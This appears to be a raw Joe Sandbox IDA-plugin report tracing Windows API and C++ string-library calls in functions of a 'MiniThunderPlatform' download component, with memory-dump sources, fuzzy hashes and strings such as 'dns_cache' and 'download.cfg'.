                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$??1?$basic_string@$V12@$Section$?assign@?$basic_string@H_prologV12@@$??4?$basic_string@?append@?$basic_string@CriticalPrivateProfileV01@$?find_first_of@?$basic_string@B1540FileInitializeLeaveModuleNameNamesstrlen
                                                                                                                                              • String ID: download.cfg$env$product_release_id$setting_file_name
                                                                                                                                              • API String ID: 3969027658-2556670429
                                                                                                                                              • Opcode ID: 92b2a533db09e8e8634e85ca03f585ed91a9fca418818b83dd376248a4d04e44
                                                                                                                                              • Instruction ID: 79573bac2190ed74f8851acfeccf235bf0db8eb72d2d7ba5517e8cae42cd4d9a
                                                                                                                                              • Opcode Fuzzy Hash: 92b2a533db09e8e8634e85ca03f585ed91a9fca418818b83dd376248a4d04e44
                                                                                                                                              • Instruction Fuzzy Hash: 19512A71800168DBDB21DBA4CD9CBDDBBB8AF69705F4041DAE50EA3241DB746B88CF61
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(.sandai.net,?,?,774D23A0), ref: 10055A60
                                                                                                                                              • ?rfind@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP71(?,FFFFFFFF,?), ref: 10055AA2
                                                                                                                                              • ??0?$basic_ostringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@H@Z.MSVCP71(00000002,00000001), ref: 10055ADB
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@D@Z.MSVCP71(00000000), ref: 10055B07
                                                                                                                                              • ?str@?$basic_ostringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@2@XZ.MSVCP71 ref: 10055B52
                                                                                                                                              • WritePrivateProfileStringA.KERNEL32(dns_cache,?,-00000004,-00000004), ref: 10055B8E
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10055B9B
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10055BAD
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10055BBF
                                                                                                                                              • ??_D?$basic_ostringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXXZ.MSVCP71 ref: 10055BD1
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10055D0A
                                                                                                                                                • Part of subcall function 10001482: __EH_prolog.LIBCMT ref: 10001487
                                                                                                                                                • Part of subcall function 10001482: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,10277ABC), ref: 1000149A
                                                                                                                                                • Part of subcall function 10001482: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(?), ref: 100014AB
                                                                                                                                                • Part of subcall function 10001482: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000), ref: 100014B5
                                                                                                                                                • Part of subcall function 10001482: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100014C5
                                                                                                                                              • GetPrivateProfileStringA.KERNEL32(dns_cache,00000001,102768F0,?,00000400,-00000004), ref: 10055C51
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10055C5B
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10055C6D
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?), ref: 10055C82
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10055CF2
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: U?$char_traits@$D@std@@V?$allocator@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$PrivateProfileStringV01@@$??$?6??0?$basic_ostringstream@?rfind@?$basic_string@?str@?$basic_ostringstream@D?$basic_ostringstream@D@2@@2@D@std@@@0@D@std@@@std@@H_prologV01@V10@V?$basic_ostream@V?$basic_string@WriteY?$basic_string@
                                                                                                                                              • String ID: .sandai.net$asyn_frame.dat$dns_cache
                                                                                                                                              • API String ID: 1376012173-3952834176
                                                                                                                                              • Opcode ID: d6ae5ee3ae7cc9095c363f0d13958585ae4321e07e058f370f57a002b0dcbe30
                                                                                                                                              • Instruction ID: 2d3becb7483b03b95308edb7453fa3aa59dd17147b83e882efed2ba1a37e2555
                                                                                                                                              • Opcode Fuzzy Hash: d6ae5ee3ae7cc9095c363f0d13958585ae4321e07e058f370f57a002b0dcbe30
                                                                                                                                              • Instruction Fuzzy Hash: F18192715083919FD724CF24C898B9BBBE4EFA9305F04495DE98A87252DB70A948CF92
                                                                                                                                              APIs
                                                                                                                                              • gethostname.WS2_32(?,00000400), ref: 100E9B86
                                                                                                                                              • WSAGetLastError.WS2_32 ref: 100E9B91
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(0.0.0.0), ref: 100E9B9E
                                                                                                                                              • gethostbyname.WS2_32(?), ref: 100E9BB1
                                                                                                                                              • WSAGetLastError.WS2_32 ref: 100E9BBD
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(0.0.0.0), ref: 100E9BCA
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 100E9CEF
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100E9D09
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$ErrorLast$??1?$basic_string@V01@@gethostbynamegethostname
                                                                                                                                              • String ID: 0.0.0.0$127.0.0.1$169
                                                                                                                                              • API String ID: 3947631988-2620441053
                                                                                                                                              • Opcode ID: aba10d01ebaad4a0b949e46351a454490539b41e6b92e36426b9fc11bdec20a6
                                                                                                                                              • Instruction ID: 4db93d7cc9a99e49ad7faf38419870707a16b7a1f47f349d4a3ee26c5c2c0c85
                                                                                                                                              • Opcode Fuzzy Hash: aba10d01ebaad4a0b949e46351a454490539b41e6b92e36426b9fc11bdec20a6
                                                                                                                                              • Instruction Fuzzy Hash: D141BB712083518FC720EF25CC8CB9AB7E5FB98B04F904A1DF546932A1CB35A889CF56
                                                                                                                                              APIs
                                                                                                                                              • ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ.MSVCP71 ref: 004255FB
                                                                                                                                              • ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ.MSVCP71(0000002E), ref: 00425620
                                                                                                                                              • ??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@PB_W@Z.MSVCP71(0x8000000), ref: 0042564B
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 004256A8
                                                                                                                                              • ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ.MSVCP71 ref: 004256D4
                                                                                                                                              • ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ.MSVCP71(00000001,00000001,00000000), ref: 0042570F
                                                                                                                                              • ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ.MSVCP71(00000000), ref: 00425725
                                                                                                                                              • ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ.MSVCP71(00000000,00000000), ref: 0042573A
                                                                                                                                              • ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ.MSVCP71(00000000), ref: 0042574D
                                                                                                                                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP71(00000000), ref: 0042576F
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71(00000000), ref: 00425795
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 004257AE
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 004257C4
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 004257DA
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 004257F3
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1614044465.0000000000417000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1614008254.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000448000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000456000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614158449.000000000045A000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614181616.000000000045C000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: U?$char_traits@_V?$allocator@_W@2@@std@@W@std@@$?data@?$basic_string@_$??1?$basic_string@_$??0?$basic_string@_?data@?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@
                                                                                                                                              • String ID: 0x8000000$MINITP\BugReport\
                                                                                                                                              • API String ID: 1662436476-1877037076
                                                                                                                                              • Opcode ID: cac32c2472425d099c65f383a261fcde34e3ad2e60a0782dcd588010909650a6
                                                                                                                                              • Instruction ID: 150ceced792e316554fc4487638913e14105c364d38e4896389e6a16a2d438ec
                                                                                                                                              • Opcode Fuzzy Hash: cac32c2472425d099c65f383a261fcde34e3ad2e60a0782dcd588010909650a6
                                                                                                                                              • Instruction Fuzzy Hash: BF51C372D005189BDB60B7B5DC467CDBA74AF44318F4201AEF80AA7182DE385E8887DA
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 10015F77
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(env,10016665,?,?,?,7C3869BF), ref: 10015FA5
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,7C3869BF), ref: 10015FB5
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,7C3869BF), ref: 10015FC5
                                                                                                                                              • GetPrivateProfileSectionNamesA.KERNEL32(?,00000800,?), ref: 10015FEA
                                                                                                                                              • GetPrivateProfileSectionA.KERNEL32(?,?,00000800,?), ref: 10016020
                                                                                                                                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(?), ref: 10016045
                                                                                                                                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(00000000), ref: 10016052
                                                                                                                                              • ?find_first_of@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIDI@Z.MSVCP71(0000003D,00000000), ref: 10016062
                                                                                                                                              • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@II@Z.MSVCP71(?,00000000,00000000), ref: 1001607A
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@II@Z.MSVCP71(?,00000001,?), ref: 10016098
                                                                                                                                              • strlen.MSVCR71(00000000,?,?,00000000,?,?), ref: 10016100
                                                                                                                                              • strlen.MSVCR71(?), ref: 1001611A
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001613F
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001614F
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001615F
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$V12@$??0?$basic_string@??1?$basic_string@$??4?$basic_string@PrivateProfileSectionV01@strlen$?append@?$basic_string@?assign@?$basic_string@?find_first_of@?$basic_string@H_prologNames
                                                                                                                                              • String ID: env
                                                                                                                                              • API String ID: 3046628333-4081402617
                                                                                                                                              • Opcode ID: d8bb6fca1b85637c5f1744c067726447c91ef36dd6736a78ea65d41ec18ad8f1
                                                                                                                                              • Instruction ID: 56c154a8bbaf1107820fcadb2a481fdf8a64cf99c891694d550ec4b29b5f8bbc
                                                                                                                                              • Opcode Fuzzy Hash: d8bb6fca1b85637c5f1744c067726447c91ef36dd6736a78ea65d41ec18ad8f1
                                                                                                                                              • Instruction Fuzzy Hash: 7B511E758001A8DFDB25CB60CC8CADDB7B8EF18341F5441D9E58AA6191DBB46BC9CF60
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z.MSVCP71 ref: 1006F153
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z.MSVCP71 ref: 1006F16C
                                                                                                                                                • Part of subcall function 100013D0: __EH_prolog.LIBCMT ref: 100013D5
                                                                                                                                                • Part of subcall function 100013D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 100013E8
                                                                                                                                                • Part of subcall function 100013D0: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000), ref: 100013F9
                                                                                                                                                • Part of subcall function 100013D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000), ref: 10001403
                                                                                                                                                • Part of subcall function 100013D0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10001413
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1006F1BF
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1006F1D1
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1006F1E6
                                                                                                                                                • Part of subcall function 10027770: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,514A63AA,10241D09,000000FF,10023A01), ref: 1002778D
                                                                                                                                                • Part of subcall function 10027770: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1002779E
                                                                                                                                                • Part of subcall function 10027770: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100277AC
                                                                                                                                                • Part of subcall function 10027770: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100277BA
                                                                                                                                                • Part of subcall function 10027770: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100277C8
                                                                                                                                                • Part of subcall function 10027770: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100277D9
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z.MSVCP71 ref: 1006F23A
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z.MSVCP71 ref: 1006F263
                                                                                                                                                • Part of subcall function 1006E770: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1006E7EB
                                                                                                                                                • Part of subcall function 1006E770: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1006E803
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z.MSVCP71(?,?), ref: 1006F2BB
                                                                                                                                              • ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71(00000000,102768F0), ref: 1006F2DE
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z.MSVCP71(?,?), ref: 1006F2F5
                                                                                                                                              • ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71 ref: 1006F315
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1006F343
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z.MSVCP71(?,?), ref: 1006F3D5
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z.MSVCP71(?,?), ref: 1006F3F5
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z.MSVCP71(?,?), ref: 1006F420
                                                                                                                                                • Part of subcall function 10083500: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 1008353D
                                                                                                                                                • Part of subcall function 10083500: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?), ref: 10083560
                                                                                                                                                • Part of subcall function 10083500: RtlInitializeCriticalSection.NTDLL ref: 10083604
                                                                                                                                                • Part of subcall function 10083500: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 10083615
                                                                                                                                                • Part of subcall function 10083500: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 10083626
                                                                                                                                                • Part of subcall function 10083500: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 10083637
                                                                                                                                                • Part of subcall function 10083500: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000000,?,?,?), ref: 10083699
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,00000000,00000000,00000000,00000000), ref: 1006F47A
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1006F49B
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1006F4B8
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1006F360
                                                                                                                                                • Part of subcall function 10023953: __EH_prolog.LIBCMT ref: 10023958
                                                                                                                                                • Part of subcall function 10023953: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10023971
                                                                                                                                                • Part of subcall function 10023953: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1002397E
                                                                                                                                                • Part of subcall function 10023953: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1002398B
                                                                                                                                                • Part of subcall function 10023953: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10023998
                                                                                                                                                • Part of subcall function 10023953: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100239A5
                                                                                                                                                • Part of subcall function 10023953: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100239B1
                                                                                                                                                • Part of subcall function 100258AC: malloc.MSVCR71(100104C9,?,100104C9,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 100258C5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??0?$basic_string@$??1?$basic_string@$??$?8D@1@@std@@D@2@@0@H_prologV01@@V?$basic_string@$?append@?$basic_string@CriticalInitializeSectionV12@V12@@malloc
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1129024372-0
                                                                                                                                              • Opcode ID: df82370c6a5d8ea4b54703590c3fa0f773a1f7fe67fb214cb8c6971efd7e4699
                                                                                                                                              • Instruction ID: 1e54d6061b0550f604b1462cfa73a362014028559728db64772cefc7744503c9
                                                                                                                                              • Opcode Fuzzy Hash: df82370c6a5d8ea4b54703590c3fa0f773a1f7fe67fb214cb8c6971efd7e4699
                                                                                                                                              • Instruction Fuzzy Hash: 95C136751083818FD370CF24C898BABBBE4FFD9315F404A0DE99A83291DB74A549CB62
                                                                                                                                              APIs
                                                                                                                                              • rand.MSVCR71(?,?,?,?,?,00000000,?,?,1003BA8A,00000000,00000000,?,?,?,?,00000000), ref: 1003AE3C
                                                                                                                                                • Part of subcall function 100261B0: __EH_prolog.LIBCMT ref: 100261B5
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?,?), ref: 100261DE
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000,?,?), ref: 1002620C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 10026226
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 1002623C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?), ref: 1002625A
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?,?,?,?,?,?,?,?,?,00000000,?,?,1003BA8A,00000000,00000000,?), ref: 1003AEAE
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?,?,?,?,?,?,?,00000000,?,?,1003BA8A,00000000,00000000,?,?,?), ref: 1003AED4
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?,?,00000000,?,?,1003BA8A,00000000,00000000,?,?,?,?), ref: 1003AEF2
                                                                                                                                              • WSAEventSelect.WS2_32(?,?,00000010), ref: 1003AF14
                                                                                                                                              • WSAGetLastError.WS2_32(?,?,?,?,?,00000000,?,?,1003BA8A,00000000,00000000,?,?,?,?,00000000), ref: 1003AF20
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
